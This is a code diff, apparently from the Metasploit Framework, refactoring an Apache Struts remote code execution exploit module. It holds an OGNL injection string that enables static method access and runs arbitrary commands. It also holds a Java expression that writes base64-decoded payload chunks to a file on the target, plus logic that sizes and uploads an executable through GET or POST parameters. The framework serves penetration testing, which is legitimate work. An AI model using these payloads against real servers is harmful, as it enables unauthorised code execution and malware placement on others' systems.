removed magic number 109

now calculated from the actual length of all static URL elements

Author: Console

modules/exploits/multi/http/struts_include_params.rb

@@ -73,19 +73,21 @@ def initialize(info = {})
 					OptEnum.new('HTTPMETHOD', [ true, 'Which HTTP Method to use, GET or POST','GET', ['GET','POST']]),
 					OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])
 		], self.class)
+
+		#initialise some base vars
+		@inject = "${#_memberAccess[\"allowStaticMethodAccess\"]=true,CMD}"
+		@java_upload_part_cmd = "#f=new java.io.FileOutputStream('FILENAME',APPEND),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('BUFFER')), #f.close()"
 	end
 
 	def execute_command(cmd, opts = {})
-		inject = "${#_memberAccess[\"allowStaticMethodAccess\"]=true,CMD}"
-		inject.gsub!(/CMD/,cmd)
+		inject_string = @inject.gsub(/CMD/,cmd)
 		uri = normalize_uri(target_uri.path)
 		req_hash = {'uri' => uri, 'version' => '1.1', 'method' => datastore['HTTPMETHOD'] }
-		
 		case datastore['HTTPMETHOD']
 			when 'POST'
-				req_hash.merge!({ 'vars_post' => { datastore['PARAMETER'] => inject }})
+				req_hash.merge!({ 'vars_post' => { datastore['PARAMETER'] => inject_string }})
 			when 'GET'
-				req_hash.merge!({ 'vars_get' => { datastore['PARAMETER'] => inject }})
+				req_hash.merge!({ 'vars_get' => { datastore['PARAMETER'] => inject_string }})
 		end
 
 # Display a nice "progress bar" instead of message spam
@@ -133,16 +135,18 @@ def exploit
 		end
 
 		print_status("Preparing payload...")
-		#Now with all the arch specific stuff set, perform the upload.
-		#161 = length of cmd string from "java_upload_part" method plus the max length of the boolean value append and the length of the inject string.
-		#Need to calculate 161.
-		sub_from_chunk = 161 + @payload_exe.length + normalize_uri(target_uri.path).length + datastore['PARAMETER'].length
+		# Now with all the arch specific stuff set, perform the upload.
+		# Need to calculate amount to allocate for non-dynamic parts of the URL.
+		# Fixed strings are tokens used for substitutions.
+		sub_from_chunk = append.length + ( @java_upload_part_cmd.length - "FILENAME".length - "APPEND".length - "BUFFER".length )
+		sub_from_chunk += ( @inject.length - "CMD".length ) + @payload_exe.length + normalize_uri(target_uri.path).length + datastore['PARAMETER'].length
 		case datastore['HTTPMETHOD']
 			when 'GET'
-				chunk_length = 2048 - sub_from_chunk
+				chunk_length = 2048 - sub_from_chunk # Using the max request length of 2048 for IIS, subtract all the "static" URL items.
+				#This lets us know the length remaining for our base64'd payloads
 				chunk_length = ((chunk_length/4).floor)*3
 			when 'POST'
-				chunk_length = 65535 # Just set this to an arbitrarily large value, as its a post request we don't care about size.
+				chunk_length = 65535 # Just set this to an arbitrarily large value, as its a post request we don't care about the size of the URL anymore.
 		end
 		@notify_flag = 0
 		while pl_exe.length > chunk_length
@@ -159,10 +163,9 @@ def exploit
 	end
 
 	def java_upload_part(part, filename, append = 'false')
-		cmd = ""
-		cmd << "#f=new java.io.FileOutputStream('#{filename}',#{append}),"
-		cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),"
-		cmd << "#f.close()"
+		cmd = @java_upload_part_cmd.gsub(/FILENAME/,filename)
+		cmd = cmd.gsub!(/APPEND/,append)
+		cmd = cmd.gsub!(/BUFFER/,Rex::Text.encode_base64(part))
 		execute_command(cmd)
 	end